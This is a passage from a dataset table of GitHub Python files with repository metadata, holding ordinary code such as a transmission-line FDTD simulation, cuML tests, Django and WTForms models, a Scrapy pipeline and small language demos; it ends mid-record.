blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cef272c84d2416ecb65b2c9f24ab13e451d85b70
|
daeba3d908791f0feedb04afbd36f350f7fdaffe
|
/super/super_usage01.py
|
6d9b60ab0fed0d9731f96711c64c5f8f0eaa9a8c
|
[] |
no_license
|
alanwooo/lab
|
03295de1a04f5736f0312aebaeb302bdb687ff97
|
d7f2697bb411ce39d8e61104f0593506e62fc7c0
|
refs/heads/master
| 2021-01-17T08:27:51.142468
| 2020-03-10T05:56:11
| 2020-03-10T05:56:11
| 65,275,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
# python3.5
class A:
def __init__(self):
print ("in A")
print ("out A")
class B(A):
def __init__(self):
print ("in B")
super().__init__()
print ("out B")
class D(B):
def __init__(self):
print ("in D")
super().__init__()
print ("out D")
class C(B):
def __init__(self):
print ("in C")
super().__init__()
print ("out C")
class E(C, D, B):
def __init__(self):
print ("in E")
super().__init__()
print ("out E")
class F(D):
def __init__(self):
print ("in F")
super().__init__()
print ("out F")
f = F()
print ('\n\n\n')
e = E()
|
[
"herobzyy@gmail.com"
] |
herobzyy@gmail.com
|
955d3f259f31f1eb653a375005ec6f630af12c82
|
023f7dc61aaa75ac1b9d4a5a63b3e35e9c0c4f9c
|
/p10/p10.py
|
5e253d411ed8638078b65bc5aeac8e06210bb795
|
[] |
no_license
|
JoseTomasTocino/tuenti-challenge-2012
|
23d0519fd8192b0d55ab8cef1dbc84e86b2f48fa
|
20fa081d49db0571e4093b6ecbb13cdd9508ae15
|
refs/heads/master
| 2021-01-22T07:27:35.474194
| 2012-05-06T17:11:48
| 2012-05-06T17:11:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,777
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 José Tomás Tocino García <theom3ga@gmail.com>
# Autor: José Tomás Tocino García
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
import sys
def main():
for line in sys.stdin:
elements = filter(None, line.strip().split())
res = 0
operands = []
for e in elements:
# Forth programming language
try:
n = int(e)
operands.append(n)
continue
except ValueError:
pass
if e == ".":
print operands.pop()
# Cambio de signo
elif e == "mirror":
n = operands.pop()
operands.append(-n)
# Duplicar operando
elif e == "breadandfish":
operands.append(operands[-1])
# Rechazar operando
elif e == "fire":
operands.pop()
# Cambiar orden de los dos últimos operandos
elif e == "dance":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n1)
operands.append(n2)
# Módulo
elif e == "conquer":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n2 % n1)
# Resta
elif e == "$":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n2 - n1)
# División
elif e == "&":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n2 / n1)
# Suma
elif e == "@":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n2 + n1)
# Producto
elif e == "#":
n1 = operands.pop()
n2 = operands.pop()
operands.append(n2 * n1)
if __name__ == '__main__':
main()
|
[
"jose@minty.(none)"
] |
jose@minty.(none)
|
3f3244a1de687250b0c8157664915e60fdef8dfb
|
497ead1ee1e09a2530aa771ae059989e341684d7
|
/python/cuml/tests/test_adapters.py
|
16dd1fce1a2a7d226cfdd6bc421dff8539280e07
|
[
"Apache-2.0"
] |
permissive
|
xieliaing/cuml
|
193f5753696bbfd4de8e3eaef919c18da2fd1d1a
|
78092ddde28d5a810e45d6186f049c1309121408
|
refs/heads/master
| 2022-11-10T16:45:38.818055
| 2022-11-03T23:12:07
| 2022-11-03T23:12:07
| 159,592,316
| 0
| 0
|
Apache-2.0
| 2018-11-29T01:59:07
| 2018-11-29T01:59:07
| null |
UTF-8
|
Python
| false
| false
| 7,586
|
py
|
#
# Copyright (c) 2020-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
import cupy as cp
import cupyx as cpx
import numpy as np
from cupyx.scipy.sparse import coo_matrix
from scipy import stats
from cuml.thirdparty_adapters.adapters import check_array, \
_get_mask as cu_get_mask, \
_masked_column_median, \
_masked_column_mean, \
_masked_column_mode
from sklearn.utils._mask import _get_mask as sk_get_mask
from cuml.thirdparty_adapters.sparsefuncs_fast import \
csr_mean_variance_axis0, \
csc_mean_variance_axis0, \
_csc_mean_variance_axis0, \
inplace_csr_row_normalize_l1, \
inplace_csr_row_normalize_l2
from cuml.testing.test_preproc_utils import assert_allclose
from sklearn.preprocessing import normalize as sk_normalize
@pytest.fixture(scope="session",
params=["zero", "one", "nan"])
def mask_dataset(request, random_seed):
cp.random.seed(random_seed)
randint = cp.random.randint(30, size=(500, 20))
randint = randint.astype(cp.float64)
if request.param == 'zero':
mask_value = 0
elif request.param == 'one':
mask_value = 1
else:
mask_value = cp.nan
random_loc = cp.random.choice(randint.size,
int(randint.size * 0.3),
replace=False)
randint.ravel()[random_loc] = mask_value
return mask_value, randint.get(), randint
@pytest.fixture(scope="session",
params=["cupy-csr", "cupy-csc"])
def sparse_random_dataset(request, random_seed):
cp.random.seed(random_seed)
X = cp.random.rand(100, 10)
random_loc = cp.random.choice(X.size, int(X.size * 0.3),
replace=False)
X.ravel()[random_loc] = 0
if request.param == 'cupy-csr':
X_sparse = cpx.scipy.sparse.csr_matrix(X)
elif request.param == 'cupy-csc':
X_sparse = cpx.scipy.sparse.csc_matrix(X)
return X.get(), X, X_sparse.get(), X_sparse
def test_check_array():
# accept_sparse
arr = coo_matrix((3, 4), dtype=cp.float64)
check_array(arr, accept_sparse=True)
with pytest.raises(ValueError):
check_array(arr, accept_sparse=False)
# dtype
arr = cp.array([[1, 2]], dtype=cp.int64)
check_array(arr, dtype=cp.int64, copy=False)
arr = cp.array([[1, 2]], dtype=cp.float32)
new_arr = check_array(arr, dtype=cp.int64)
assert new_arr.dtype == cp.int64
# order
arr = cp.array([[1, 2]], dtype=cp.int64, order='F')
new_arr = check_array(arr, order='F')
assert new_arr.flags.f_contiguous
new_arr = check_array(arr, order='C')
assert new_arr.flags.c_contiguous
# force_all_finite
arr = cp.array([[1, cp.inf]])
check_array(arr, force_all_finite=False)
with pytest.raises(ValueError):
check_array(arr, force_all_finite=True)
# ensure_2d
arr = cp.array([1, 2], dtype=cp.float32)
check_array(arr, ensure_2d=False)
with pytest.raises(ValueError):
check_array(arr, ensure_2d=True)
# ensure_2d
arr = cp.array([[1, 2, 3], [4, 5, 6]], dtype=cp.float32)
check_array(arr, ensure_2d=True)
# ensure_min_samples
arr = cp.array([[1, 2]], dtype=cp.float32)
check_array(arr, ensure_min_samples=1)
with pytest.raises(ValueError):
check_array(arr, ensure_min_samples=2)
# ensure_min_features
arr = cp.array([[]], dtype=cp.float32)
check_array(arr, ensure_min_features=0)
with pytest.raises(ValueError):
check_array(arr, ensure_min_features=1)
def test_csr_mean_variance_axis0(failure_logger, sparse_random_dataset):
X_np, _, _, X_sparse = sparse_random_dataset
if X_sparse.format != 'csr':
pytest.skip('Skip non CSR matrices')
means, variances = csr_mean_variance_axis0(X_sparse)
ref_means = np.nanmean(X_np, axis=0)
ref_variances = np.nanvar(X_np, axis=0)
assert_allclose(means, ref_means)
assert_allclose(variances, ref_variances)
def test_csc_mean_variance_axis0(failure_logger, sparse_random_dataset):
X_np, _, _, X_sparse = sparse_random_dataset
if X_sparse.format != 'csc':
pytest.skip('Skip non CSC matrices')
means, variances = csc_mean_variance_axis0(X_sparse)
ref_means = np.nanmean(X_np, axis=0)
ref_variances = np.nanvar(X_np, axis=0)
assert_allclose(means, ref_means)
assert_allclose(variances, ref_variances)
def test__csc_mean_variance_axis0(failure_logger, sparse_random_dataset):
X_np, _, _, X_sparse = sparse_random_dataset
if X_sparse.format != 'csc':
pytest.skip('Skip non CSC matrices')
means, variances, counts_nan = _csc_mean_variance_axis0(X_sparse)
ref_means = np.nanmean(X_np, axis=0)
ref_variances = np.nanvar(X_np, axis=0)
ref_counts_nan = np.isnan(X_np).sum(axis=0)
assert_allclose(means, ref_means)
assert_allclose(variances, ref_variances)
assert_allclose(counts_nan, ref_counts_nan)
def test_inplace_csr_row_normalize_l1(failure_logger, sparse_random_dataset):
X_np, _, _, X_sparse = sparse_random_dataset
if X_sparse.format != 'csr':
pytest.skip('Skip non CSR matrices')
inplace_csr_row_normalize_l1(X_sparse)
X_np = sk_normalize(X_np, norm='l1', axis=1)
assert_allclose(X_sparse, X_np)
def test_inplace_csr_row_normalize_l2(failure_logger, sparse_random_dataset):
X_np, _, _, X_sparse = sparse_random_dataset
if X_sparse.format != 'csr':
pytest.skip('Skip non CSR matrices')
inplace_csr_row_normalize_l2(X_sparse)
X_np = sk_normalize(X_np, norm='l2', axis=1)
assert_allclose(X_sparse, X_np)
def test_get_mask(failure_logger, mask_dataset):
mask_value, X_np, X = mask_dataset
cu_mask = cu_get_mask(X, value_to_mask=mask_value)
sk_mask = sk_get_mask(X_np, value_to_mask=mask_value)
assert_allclose(cu_mask, sk_mask)
def test_masked_column_median(failure_logger, mask_dataset):
mask_value, X_np, X = mask_dataset
median = _masked_column_median(X, mask_value).get()
mask = ~sk_get_mask(X_np, value_to_mask=mask_value)
n_columns = X.shape[1]
for i in range(n_columns):
column_mask = mask[:, i]
column_median = np.median(X_np[:, i][column_mask])
assert column_median == median[i]
def test_masked_column_mean(failure_logger, mask_dataset):
mask_value, X_np, X = mask_dataset
mean = _masked_column_mean(X, mask_value).get()
mask = ~sk_get_mask(X_np, value_to_mask=mask_value)
n_columns = X.shape[1]
for i in range(n_columns):
column_mask = mask[:, i]
column_mean = np.mean(X_np[:, i][column_mask])
assert column_mean == mean[i]
def test_masked_column_mode(failure_logger, mask_dataset):
mask_value, X_np, X = mask_dataset
mode = _masked_column_mode(X, mask_value).get()
mask = ~sk_get_mask(X_np, value_to_mask=mask_value)
n_columns = X.shape[1]
for i in range(n_columns):
column_mask = mask[:, i]
column_mode = stats.mode(X_np[:, i][column_mask])[0][0]
assert column_mode == mode[i]
|
[
"noreply@github.com"
] |
xieliaing.noreply@github.com
|
ffc6a5ef9fe085d32afb8e7786aaba1a6ab7a4ed
|
97aefba1d8eb779cafbaa46744b436668cb3e544
|
/GenomicSegmentVector.py
|
949bc7bb1c3e4e2871fced213bc48bd2645483d2
|
[] |
no_license
|
ucscCancer/cgDataV2
|
9a6e835aceaf4c0c6f50092a4e76bb4d8127a922
|
82f13fa5a6d57412d39a8773c2cfea830f6f4b8e
|
refs/heads/master
| 2020-05-17T16:55:38.984987
| 2012-07-31T17:29:09
| 2012-07-31T17:29:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,930
|
py
|
import cgDataV2.Exceptions
class GenomicSegmentVector(object):
"""GenomicSegmentVector objects indicate which segments were
present in the indicated samples, and with what score For example,
copy number data can be represented as GenomicSegmentVectors.
Each GenomicSegmentVector contains the following fields:
- sampleId: the name of the sample in which the segment was observed
- chrom: name of the chromosome
- start: starting position within the chromosome or scaffold
- end: ending position within the chromosome or scaffold.
- strand: either '+' for forward, '-' for reverse, or '.' for both
- score: floating point score for the segment
Comment: in the API document, the term "GenomicSegment" seems to
refer to a file of genomic segment observations. But I feel like
there are two different classes: GenomicSegmentVector objects, in
which each object represents the observation of one segment in one
indicated sample; and GenomicSegmentSet objects, representing a
set of GenomicSegmentVectors that are contained together in a
file.
See Also: GenomicSegmentSet
"""
# __format__ = {
# "name" : "genomicSegment",
# "type" : "type",
# "form" : "table",
# "columnOrder" : [
# "id",
# "chrom",
# "chrom_start",
# "chrom_end",
# "strand",
# "value"
# ],
# "groupKey" : "id",
# "columnDef" : {
# "chrom_start" : { "type" : "int" },
# "chrom_end" : { "type" : "int" },
# "value" : { "type" : "float" }
# }
# }
def __init__(self, line=None):
"""Creates a new GenomicSegmentVector object. If line is
None, an empty object is returned. Else, the contents of the
GenomicSegmentVector are parsed from the line, which should
contain the indicated fields and be whitespace-delimited.
As a final initialization step, the object is validated. If
validation fails, a ValidationFailed exception is thrown.
"""
pass
def __validate(self):
"""Validate this GenomicSegmentVector, and throw a ValidationFailed
object if unsuccessful. """
pass
def genomicSegmentVectorCompare(vector1, vector2):
"""Return the results of comparing vector1 to vector2, comparing each field
(id, chrom, chromStart, chromEnd, strand, value) in the order indicated.
Use numeric comparison on chromStart, chromEnd, and value, and lexical
comparison on all other fields."""
pass
def write(self, filehandle, delimiter="\t"):
"""Write a GenomicSegmentVector object to the indicated
filehandle. The data is written in tab-delimited format by
default.
"""
pass
|
[
"cline@soe.ucsc.edu"
] |
cline@soe.ucsc.edu
|
d40a97402a952bbd38692329a69dfc90a2057125
|
6e7ad01744a4590da9380ff4cba9c709863fd159
|
/home/models.py
|
60ab83a98285e1b79bbb39c65d32202a987ff228
|
[] |
no_license
|
MDRasel-Al-Mamun/Multi-Image-Upload
|
0312a967a9566635b96bbf8ac4afc27829481524
|
3c81749f405d18c6a5df908d54265ccbfca9d5cf
|
refs/heads/master
| 2023-01-09T13:07:07.371035
| 2020-10-31T04:49:17
| 2020-10-31T04:49:17
| 308,805,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
from django.db import models
class Doc(models.Model):
upload = models.FileField(upload_to='images/')
def __str__(self):
return str(self.pk)
|
[
"djangoprojectbd@gmail.com"
] |
djangoprojectbd@gmail.com
|
1f8cfb3290576d3377f6f48f96fb1c3d222fc897
|
fa5712725ebaf0d219f9752c24b34ed96c68c242
|
/FDTD-tranmission-lines.py
|
3a4180bf2c8e0ebc950162dc698684cef45cc269
|
[] |
no_license
|
andrebpradof/FDTD-transmission-lines
|
e5811571b9d42c1c3d05aeba445b6be794a3cace
|
b36a7e02bdf8e2325763ed0aeb2a619dc9266246
|
refs/heads/master
| 2022-07-20T13:18:44.046272
| 2020-05-25T01:00:20
| 2020-05-25T01:00:20
| 266,454,392
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,567
|
py
|
# //////////////////////////////////////////////////////////////////
# // SEL0612 - Ondas eletromagneticas (2020) //
# // Trabalho 01 - Linhas de trasmissao //
# // //
# // Alunos: //
# // André Baconcelo Prado Furlanetti - Nº USP: 10748305 //
# // Diego da Silva Parra - Nº USP: 10716550 //
# // Mateus Fernandes Doimo - Nº USP: 10691971 //
# //////////////////////////////////////////////////////////////////
import numpy as np
import math
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
import scipy.constants as sci
import matplotlib as mpl
#mpl.rcParams['animation.ffmpeg_path'] = 'ffmpeg/bin/ffmpeg.exe' # Usado para salvar as animações
# Retona qual fonte o usuário escolheu
def fonte(res_fonte,t,l):
if int(res_fonte) == 1:
return Vs1(t)
else:
return Vs2(t,l)
#Função Degrau Unitário
def u(t):
if t >= 0:
return 1
else:
return 0
#Primeira fonte de tensão
def Vs1(t):
return 2*u(t)
#Segunda fonte de tensão
def Vs2(t,l):
return u(t) - u(t - l/(10*uf))
# Atualiza os valores da voltagem na animação
def animacao_voltagem(n):
voltage_plot.set_ydata(V[n])
return voltage_plot
# Atualiza os valores da corrente na animação
def animacao_corrente(n):
current_plot.set_ydata(I[n])
return current_plot
# Pega as informações do usuário
# Fonte = 1 --> *u(t) 2 --> u(t) - u(t - l/(10*uf))
res_fonte = input("Fonte: 1 ou 2 ? ")
# Carga
res_carga = input("Carga: 0, 100 ou inf? ")
l = int(input("Tamanho da linha (l): "))
K = int(input("Numero de interacoes: "))
#Carga
if str(res_carga) == "0":
Rl = 0
nome_anim_RL = "0"
elif str(res_carga) == "100":
Rl = 100
nome_anim_RL = "100"
else:
Rl = math.inf
nome_anim_RL = "Inf"
#Velocidade do sinal de tensão ou de corrente
uf = 0.9*sci.speed_of_light
#Tempo total
tempo_t = 10*l/uf
#Tamanho de dz
dz = l/K
#Tamanho do dt
dt = dz/uf*0.2
# Número de iterações no tempo
N = int(tempo_t/dt)
#Impedância característica
Zo = 50
#Resistência interna da fonte de tensão
Rs = 75
#Cálculo da capacitância a da indutância
C = 1/(Zo*uf) #Capacitância
L = Zo/uf #Indutância
#Matrizes de tensão e corrente
V = np.zeros((N, K)) #Tensão
I = np.zeros((N, K-1)) #Corrente
#Tamanho do eixo x dos gráficos
eixo_x = np.array(range(K))*dz
#Tensão e corrente com t --> ao infinito
V_inf = (Rl*fonte(res_fonte,N*dt,l))/(Rl+Rs)
I_inf = fonte(res_fonte,N*dt,l)/(Rl+Rs)
print("\nResultados:")
print("V∞(z,t) = "+str(V_inf))
print("I∞(z,t) = "+str(I_inf))
#Condições iniciais de tensão e corrente
V[0][0] = (Zo*fonte(res_fonte, 0,K*dz))/(Rs+Zo)
I[0][0] = fonte(res_fonte,0, K*dz)/(Rs+Zo)
beta_1 = 2*dt/(Rs*C*dz)
if Rl == 0:
beta_2 = math.inf
elif Rl == math.inf:
beta_2 = 0
else:
beta_2 = 2*dt/(Rl*C*dz)
# Metodo FDTD
for n in range(1,N):
# Condicao de controrno da tensao no inicio da linha
V[n][0] = (1 - beta_1)*V[n-1][0] -2*I[n-1][0] + (2/Rs)*fonte(res_fonte,(n-1)*dt,l)
# Tensao para toda linha K
for k in range (1,K-1):
V[n][k] = V[n-1][k] - (I[n-1][k]-I[n-1][k-1])
# Condicao de contorno da tensao no final da linha
if Rl == 0:
V[n][K-1] = 0
else:
V[n][K-1] = (1 - beta_2)*V[n-1][K-1] + 2*I[n-1][K-2]
# Corrente para toda linha K-1
for k in range (0, K-1):
I[n][k] = I[n-1][k] - (dt**2)/(L*C*dz**2)*(V[n][k+1] - V[n][k])
V = V*(dt/(C*dz))
################### Animações ###################
# Ajustes no tamanho do eixo y
if Rl == math.inf:
if int(res_fonte) == 1:
volt_limite_y = 3
else:
volt_limite_y = 2
corrente_limite_y = 0.04
elif Rl == 0:
volt_limite_y = 2.2
if int(res_fonte) == 1:
corrente_limite_y = 0.06
else:
corrente_limite_y = 0.03
else:
volt_limite_y = 2.2
corrente_limite_y = 0.04
# Configurando gráfico da tensão
figure, voltage = pyplot.subplots(1,1)
voltage.grid(True)
figure.patch.set_facecolor('#E0E0E0')
figure.patch.set_alpha(0.7)
voltage_plot, = voltage.plot(np.linspace(0,l,K), V[0], color='b', label='Voltage [V]')
voltage.set_ylim(-1.2, volt_limite_y)
voltage.legend()
voltage.set_ylabel('V(z,t)')
voltage.set_xlabel('z (m)')
voltage.set_title('Voltagem')
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
animation1 = animation.FuncAnimation(figure, func = animacao_voltagem, frames=np.arange(0, N, (int)(K/10)), interval = 100, repeat = False)
# Para salvar a animação em .mp4
#animation1.save("Fonte_"+res_fonte+"_voltagem_RL_"+nome_anim_RL+".mp4", writer = 'ffmpeg')
# Configurando gráfico da corrente
figure2, current = pyplot.subplots(1,1)
current.grid(True)
figure2.patch.set_facecolor('#E0E0E0')
figure2.patch.set_alpha(0.7)
current_plot, = current.plot(np.linspace(0,l,K-1), I[0], color='g', label='Corrente [A]')
current.set_ylim(-0.025, corrente_limite_y)
current.legend()
current.set_ylabel('I(z,t)')
current.set_xlabel('z (m)')
current.set_title('Corrente')
animation2 = animation.FuncAnimation(figure2, func = animacao_corrente, frames=np.arange(0, N, (int)(K/10)), interval = 100, repeat = False)
# Para salvar a animação em .mp4
#animation2.save("Fonte_"+res_fonte+"_corrente_RL_"+nome_anim_RL+".mp4", writer = 'ffmpeg')
#Mostra as animações
pyplot.show()
|
[
"andrebpf@usp.br"
] |
andrebpf@usp.br
|
c10a18eb79c5b64d24b77b0797b8913909e5ade6
|
229b5bb81cdaad731b9ab823d4bccc9c2f26c159
|
/todo/models.py
|
0b0da82167b1479423a0ebf278d9890ef665e9d9
|
[] |
no_license
|
kirbyeggs/todosite
|
1d3619e78d4b16d636cee76aef303d93cf53752c
|
c506c4f9ed328e3ed7c6e490e5cfe8c1f734d880
|
refs/heads/master
| 2021-01-10T08:26:23.577811
| 2015-12-02T00:01:44
| 2015-12-02T00:01:44
| 45,493,483
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
from django.db import models
from django.core.validators import MinValueValidator
# Create your models here.
class To_do(models.Model):
priority = models.PositiveSmallIntegerField(validators=[MinValueValidator(1)], verbose_name = 'Priority', default = 1)
date = models.DateTimeField(verbose_name = 'Date', auto_now_add = True)
description = models.CharField(verbose_name = 'Description', max_length = 200)
username = models.CharField(max_length = 20)
|
[
"kirbyeggs0@gmail.com"
] |
kirbyeggs0@gmail.com
|
897b7d818bbdc047c3a5c7aa83382dce201a5c58
|
b52bf66bef5ce6fdd7f5e0674a625e8719acbac3
|
/01-24/ranking/ranking/pipelines.py
|
54b006523813fa923be6d7c766ce6295db52090c
|
[] |
no_license
|
itarvin/spider
|
18b8ee811f698769bb189557d8b642d39e08f53c
|
a38c4e61c52da630b7103edd4fad5f4b2bf1ccb7
|
refs/heads/master
| 2021-07-06T10:59:12.636360
| 2018-04-23T23:52:34
| 2018-04-23T23:52:34
| 282,765,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
# 文件处理类库,可以指定编码格式
import codecs
import json
class RankingPipeline(object):
# def process_item(self, item, spider):
# return item
def __init__(self):
# 创建一个只写文件,指定文本编码格式为utf-8
self.filename = codecs.open('80smovies.json', 'w', encoding='utf-8')
def process_item(self, item, spider):
content = json.dumps(dict(item), ensure_ascii=False) + "\n"
self.filename.write(content)
return item
def spider_closed(self, spider):
self.file.close()
|
[
"itarvin@126.com"
] |
itarvin@126.com
|
e2db0757093e0a624f48128fa8d25b79ce224b38
|
1e525380cce54ae61b34e0b8ae30c93fe5bfb885
|
/tests/unit/test_buildah.py
|
1d122e0e6a267d90f6ae663dae3961a5b090d355
|
[
"MIT"
] |
permissive
|
TomasTomecek/ansible-bender
|
376d8c760cbb78f52888cefebb56f280c32c585f
|
dffcde94f6fc04de149051444fd62bf0414314b5
|
refs/heads/master
| 2023-04-28T11:44:29.180807
| 2020-04-01T11:32:50
| 2020-04-01T12:42:11
| 176,808,595
| 19
| 2
|
MIT
| 2021-11-19T15:57:11
| 2019-03-20T20:05:15
|
Python
|
UTF-8
|
Python
| false
| false
| 585
|
py
|
import json
from ansible_bender.builders import buildah_builder
from ansible_bender.builders.buildah_builder import get_buildah_image_id
from flexmock import flexmock
from tests.spellbook import buildah_inspect_data_path
def mock_inspect():
with open(buildah_inspect_data_path) as fd:
buildah_inspect_data = json.load(fd)
flexmock(buildah_builder, inspect_resource=lambda x, y: buildah_inspect_data)
def test_buildah_id():
mock_inspect()
assert get_buildah_image_id("this-is-mocked") == "6aed6d59a707a7040ad25063eafd3a2165961a2c9f4d1d06ed0a73bdf2a89322"
|
[
"ttomecek@redhat.com"
] |
ttomecek@redhat.com
|
74041fbece6bee0a5c02a587c5b6f1e21ef4dee4
|
267f80e1510e6de06a2c2cf2e2a08d3db8a7811e
|
/venv/bin/wheel
|
52017e250d4f40ac4215328f6160d9c3e2e092d1
|
[
"CC-BY-2.5",
"Apache-2.0"
] |
permissive
|
NalediMadlopha/google-python-exercises
|
ef9503b041fb81bf9401da6db867f208d3ea4e59
|
9ad88c1c539111f0b6dd52109114bde875dacc71
|
refs/heads/master
| 2020-08-07T02:38:47.868274
| 2019-10-06T23:26:34
| 2019-10-06T23:26:34
| 213,258,801
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
#!/Users/naledi/Workspace/practise/Python/google-python-exercises/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"naledi.madlopha@gmail.com"
] |
naledi.madlopha@gmail.com
|
|
1d4a814e2190852e8387ad1a5acc052de015b9a0
|
9907672fcd81ab73ac63b2a83422a82bf31eadde
|
/hackerrank/punctuation-corrector-its.py
|
f3595458821fabfefedcbda7b611ad3230426d7b
|
[
"0BSD"
] |
permissive
|
cielavenir/procon
|
bbe1974b9bddb51b76d58722a0686a5b477c4456
|
746e1a91f574f20647e8aaaac0d9e6173f741176
|
refs/heads/master
| 2023-06-21T23:11:24.562546
| 2023-06-11T13:15:15
| 2023-06-11T13:15:15
| 7,557,464
| 137
| 136
| null | 2020-10-20T09:35:52
| 2013-01-11T09:40:26
|
C++
|
UTF-8
|
Python
| false
| false
| 234
|
py
|
#!/usr/bin/python
#coding:utf-8
import sys
if sys.version_info[0]>=3: raw_input=input
for i in range(int(raw_input())):
s=raw_input().rstrip()
if s[0:3]=='???':
print(s.replace('???',"It's"))
else:
print(s.replace('???','its'))
|
[
"cielartisan@gmail.com"
] |
cielartisan@gmail.com
|
64a1d271708de64b04bc1ae03232247c989b365d
|
fcbb60497db52eafc0ce5ff7e3ed65b7f6d4e42b
|
/05 decorators/contextlib_with1.py
|
5a95ae5b28d695e79753527fbca7ada6b50df61e
|
[] |
no_license
|
bambrikii/test-python-2
|
dfbd16dfd536fd2e841f39d004f0d499ed08ed09
|
12fac97a5e111abcf3be7cfbed141e4d1b7d0fa8
|
refs/heads/master
| 2020-03-27T06:41:03.654213
| 2016-11-20T18:52:21
| 2016-11-20T18:52:44
| 146,126,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
#!/bin/python
from __future__ import print_function
import contextlib
@contextlib.contextmanager
def open_context_manager(filename, mode="r"):
fh = open(filename, mode)
yield fh
fh.close()
with open_context_manager("contextlib_with1-1.txt", "w") as fh:
print('The test 1 is complete!', file=fh); # uses __future__.print_function.print. see imports
fh.write('The test 1 is complete!')
with contextlib.closing(open("contextlib_with1-2.txt", "w")) as fh:
print('The test 2 is complete!', file=fh); # uses __future__.print_function.print. see imports
fh.write('The test 2 is complete!');
|
[
"bambrikii@gmail.com"
] |
bambrikii@gmail.com
|
096663da95904bba3e537f0a95908b2c43e1ff77
|
9e40da51a8897562ce4e9fac4fd3076dde6f87af
|
/app/mod_auth/forms.py
|
69c2da533430c24fe9a657bdc19c5a0d417dcedc
|
[] |
no_license
|
Sanchit-Trivedi/nursery_management_project-1
|
01c92dfcc542c9a268dab8739d0798e7a66771e5
|
774cae522ae27726eda7966ca74273eea06adfbd
|
refs/heads/master
| 2022-11-13T23:54:32.740694
| 2020-07-07T21:29:45
| 2020-07-07T21:29:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
# Import Form and RecaptchaField (optional)
# , RecaptchaField
# Import Form elements such as TextField and BooleanField (optional)
# BooleanField
# Import Form validators
from wtforms.validators import Required, Email, EqualTo
from wtforms import TextField, Form, BooleanField, StringField, PasswordField, validators
from wtforms.fields.core import RadioField, SelectField
# Define the login form (WTForms)
class LoginForm(Form):
email = email = StringField('Email Address', [validators.Length(min=6, max=35), validators.DataRequired()])
password = PasswordField('Password', [validators.DataRequired()])
class RegistrationForm(Form):
name = StringField('Name', [validators.Length(min=4, max=25), validators.DataRequired(),])
email = StringField('Email Address', [validators.Length(min=6, max=35), validators.DataRequired(),])
password = PasswordField('New Password', [
validators.DataRequired(),
validators.EqualTo('confirm', message='Passwords must match')
])
confirm = PasswordField('Confirm Password')
role = SelectField('Role', choices=[('0','Customer'),('1','Owner')])
|
[
"nikunj18249@iiitd.ac.in"
] |
nikunj18249@iiitd.ac.in
|
3ab459e404bd2ac66d52f4c12ebd7653ecdeb7ed
|
727f1bc2205c88577b419cf0036c029b8c6f7766
|
/out-bin/py/google/fhir/models/run_locally.runfiles/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/text/python/ops/__init__.py
|
eba90bf6317a8929a63a56d0b1e0e601abd2b6aa
|
[
"Apache-2.0"
] |
permissive
|
rasalt/fhir
|
55cf78feed3596a3101b86f9e9bbf6652c6ed4ad
|
